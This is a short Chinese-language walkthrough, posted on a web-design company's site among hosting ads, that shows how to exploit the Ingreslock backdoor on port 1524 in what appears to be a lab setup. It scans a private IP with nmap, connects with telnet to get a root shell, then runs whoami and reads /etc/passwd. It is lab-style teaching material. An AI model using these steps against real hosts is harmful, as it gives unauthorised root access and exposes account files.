Ingreslock后门漏洞-创新互联

利用telnet命令连接目标主机的1524端口，直接获取root权限。

公司主营业务：网站建设、做网站、移动网站开发等业务。帮助企业客户真正实现互联网宣传，提高企业的竞争能力。成都创新互联是一支青春激扬、勤奋敬业、活力青春激扬、勤奋敬业、活力澎湃、和谐高效的团队。公司秉承以“开放、自由、严谨、自律”为核心的企业文化，感谢他们对我们的高要求，感谢他们从不同领域给我们带来的挑战，让我们激情的团队有机会用头脑与智慧不断的给客户带来惊喜。成都创新互联推出肇庆免费做网站回馈大家。

Ingreslock后门程序监听在1524端口，连接到1524端口就可以直接获得root权限, 经常被用于***一个暴露的服务器。

一、利用nmap工具扫描目标主机

1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处，右键菜单选择“在终端中打开”。

1.2 在终端中输入命令“nmap –sV 192.168.1.3”，对目标主机进行端口扫描，发现开放1524端口。

Ingreslock后门漏洞

1.3 在终端中输入命令“telnet 192.168.1.3 1524”，连接目标主机1524端口，先是连接成功。如图3所示

1.4 在终端中输入命令“whoami”，查找获取的权限。如图4所示

Ingreslock后门漏洞

1.5 在终端中输入命令“ifconfig eth0”，查看网卡信息，在终端下输入“cat /etc/passwd”,查看远程主机的密码文件。

Ingreslock后门漏洞

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

网站栏目：Ingreslock后门漏洞-创新互联
文章出自：https://www.cdcxhl.com/article48/dijcep.html

成都网站建设公司_创新互联，为您提供网站制作、App开发、微信小程序、网站导航、网站设计公司、网站排名

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源：创新互联

猜你还喜欢下面的内容